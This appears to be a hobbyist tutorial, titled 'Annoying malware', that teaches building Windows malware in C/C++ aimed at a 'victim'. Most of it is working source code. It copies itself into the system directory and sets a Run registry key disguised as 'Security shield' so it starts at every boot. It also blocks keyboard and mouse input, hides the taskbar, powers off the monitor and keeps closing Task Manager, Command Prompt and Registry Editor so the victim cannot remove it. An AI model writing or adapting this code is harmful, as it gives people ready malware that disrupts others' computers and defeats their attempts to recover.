Annoying malware
Hi guys
Welcome back :)
NOTE:
Making malware is not always for destruction. It’s not fun at all to destruct someones’ machine. So, let’s play with our victim :).
We have seen how to make a MsgBox now how to put our executable in a specific place?
#include <windows.h>
int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance,
LPSTR lpszArgument, int nFunsterStil)
{
char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandleA(NULL);
GetModuleFileNameA(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectoryA(system,sizeof(system));
strcat(system,"\\MsgBox.exe");
CopyFile(pathtofile,system,false);
MessageBoxA( NULL, "Hello From Nakerah", "Nakerah NG", MB_OK );
return 0;
}
Now compile and run.
Explaination time:
first we defined system[MAX_PATH] a buffer to hold our directory, then pathtofile[MAX_PATH] a buffer to hold the file path where our malware will be stored.
GetModuleHandleA() is the module handle function.
the GetModuleFileNameA() which will retrieve file path contains a spesified module which must be loaded by the current process.
the GetSystemDirectoryA() basiclly find out what your system directory is , because It’s not a must that all windows machines have the c:\windows\system32 as system directory mine is c:\windows\system32
strcat which appends a copy of the source string to the destination string so now our system buffer holds the value “c:\windows\system32\MsgBox.exe”. Note the ‘\\’ is doubled. Don’t worry, that is not a typo, the first one to escape the second one which resaulting a single ‘\’.
CopyFile() it already explained itself we gonna place our malware to the place we wanna it to be. the false is to overwrite the file if exist.
Compile your code and go to the file double click then you now should see a MsgBox.
So now we can replace the MsgBox with some stuff.
We are going to use 3 APIs :
- RegOpenKeyExA() to open a specified registry key.
- RegSetValueExA() to set the data and type of a specified value under a registry key.
- RegCloseKey() to close the registry key
HKEY hKey;
RegOpenKeyExA(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueExA(hKey, "Security shield",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey);
HKEY hKey is the buffer that holds the data for calls to the registry. First, we open the key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run, which is the key for starting up for all users, which is what we want. 0 is reserved, so better to keep it 0. Next, we used KEY_SET_VALUE to open it with permissions then we put our buffer. The RegSetValueExA which takes our buffer , the message will appears on the key I chose security shield for misleading , 0 is also reserved, REG_SZ is the type we wanna for the register Registery types, (const unsigned char*) system, well system is the buffer holds system directory and const unsigned char to format the string to unsigned char because this section doesnt accept normal characters and finally string size. </br> Finally, we closed the registry.
Now let’s add our annoying part.
#include <windows.h>
int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance,
LPSTR lpszArgument, int nFunsterStil)
{
char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandleA(NULL);
GetModuleFileNameA(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectoryA(system,sizeof(system));
strcat(system,"\\annoyingMalware.exe");
CopyFile(pathtofile,system,false);
HKEY hKey;
RegOpenKeyExA(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueExA(hKey, "Security shield",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey);
HWND hWin;
hWin = FindWindow("Shell_TrayWnd",NULL); // get handle window of taskbar
EnableWindow(hWin,false);
while(1==1)
{
ShowWindow(hWin,false);
Sleep(1000);
ShowWindow(hWin,true);
Sleep(1000);
}
return 0;
}
Although it’s a small one, don’t underestimate it. It will make your taskbar disappear every 1000 seconds. How to fix this? press ctrl+alt+delete and end both annoyingMalware.exe and explorer.exe
It doesn’t make sense to let the victim fix what we have ruined, so we want to prevent him, but how?.
Well, can we make him not able to open task manager?. Obviously, yes, as long as it’s coding, so nothing we can’t do :)
Destroying Task Manager and other Windows.
Now, this is easy and not hard to understand. to find the task manager window or other windows, all you have to do is use the FindWindowA() function.
HWND TaskMgr;
TaskMgr = FindWindow(NULL,"Windows Task Manager");
Again what do we want to do?. Right, we want our victim not to be able to open task manager. An easy way to check if it’s open, and if it is true, close it, simple right?.
We can do that with PostMessageA which will send a message WM_CLOSE in our case to close it.
if( TaskMgr != NULL )
{
PostMessageA( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
But still, we can do more, like we can block user input by BlockInput() function, so he can’t even move his mouse or write an any.
{
\\\
BlockInput(true);
\\\\\
}
We can also control his monitor as well by SendMessage actually SendMessage & PostMessageA are kinda same but there is a little difference, but pretty sure both have same results.
SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) 2);
Sleep(5000);
SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) -1);
we also can play with his mouse with SetCursorPos() just we can set the cursor in random positions
while(1){
X = rand()%801;
Y = rand()%601;
SetCursorPos( X, Y );
}
Well, what else can we do? :) Let’s start a process.
We can do that with ShellExecuteA(). We are going to start notepad for example.
#include <windows.h>
int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance,
LPSTR lpszArgument, int nFunsterStil)
{
char Notepad[MAX_PATH]="notepad.exe";
ShellExecuteA(NULL,"open",Notepad,NULL,NULL,SW_SHOWNORMAL);
return 0;
}
Compile and run.
so we can start any process that exists in the machine. COOL :)
Now I can let you figure out what this one does :3.
#include <iostream>
#include <stdio.h>
#include <windows.h>
#include <winable.h>
#include <conio.h>
#include <ctime>
using namespace std;
int random, Freq, Dur, X, Y;
HWND mywindow, TaskMgr, CMD, Regedit;
char Notepad[MAX_PATH]="notepad.exe";
char MineSweeper[MAX_PATH]="winmine.exe";
char Hearts[MAX_PATH]="mshearts.exe";
char Website[MAX_PATH]="http:\\www.google.com";
void SetUp();
void Run( int ID );
void Beeper(), OpenStuff(), Hibernation(), CrazyMouse();
DWORD WINAPI DestroyWindows(LPVOID);
int main()
{
srand( time(0) );
random = rand()%6;
system("title :.Virus.:");
BlockInput( true );
SetUp();
BlockInput( false );
CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&DestroyWindows, 0, 0, NULL);
while(1)
{
Run( random );
Sleep(10);
}
}
void SetUp()
{
char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));
strcat(system,"\\winminer.exe");
CopyFile(pathtofile,system,false);
HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, "SetUp",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey);
mywindow = FindWindow(NULL,":.Virus.:");
cout<<"You Are under attack";
Sleep(1000);
ShowWindow(mywindow, false);
}
void Run( int ID )
{
if( ID == 1 )
{
BlockInput(true);
}
else if( ID == 2 )
{
Beeper();
}
else if( ID == 3 )
{
OpenStuff();
}
else if( ID == 4 )
{
Hibernation();
}
else if( ID == 5 )
{
CrazyMouse();
}
else
{
BlockInput(true);
Beeper();
OpenStuff();
CrazyMouse();
}
}
void Beeper()
{
Freq = rand()%2001;
Dur = rand()%301;
Beep( Freq, Dur );
}
void OpenStuff()
{
ShellExecute(NULL,"open",Notepad,NULL,NULL,SW_MAXIMIZE);
ShellExecute(NULL,"open",MineSweeper,NULL,NULL,SW_MAXIMIZE);
ShellExecute(NULL,"open",Hearts,NULL,NULL,SW_MAXIMIZE);
ShellExecute(NULL,"open",Website,NULL,NULL,SW_MAXIMIZE);
}
void Hibernation()
{
Sleep(1000);
SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) 2);
}
void CrazyMouse()
{
X = rand()%801;
Y = rand()%601;
SetCursorPos( X, Y );
}
DWORD WINAPI DestroyWindows(LPVOID)
{
while(1)
{
TaskMgr = FindWindow(NULL,"Windows Task Manager");
CMD = FindWindow(NULL, "Command Prompt");
Regedit = FindWindow(NULL,"Registry Editor");
if( TaskMgr != NULL )
{
SetWindowText( TaskMgr, "You Are Hacked");
PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
if( CMD != NULL )
{
SetWindowText( CMD, "You Are Hacked");
PostMessage( CMD, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
if( Regedit != NULL )
{
SetWindowText( Regedit, "You Are Hacked");
PostMessage( Regedit, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
Sleep(10);
}
}
That’s enough for today :).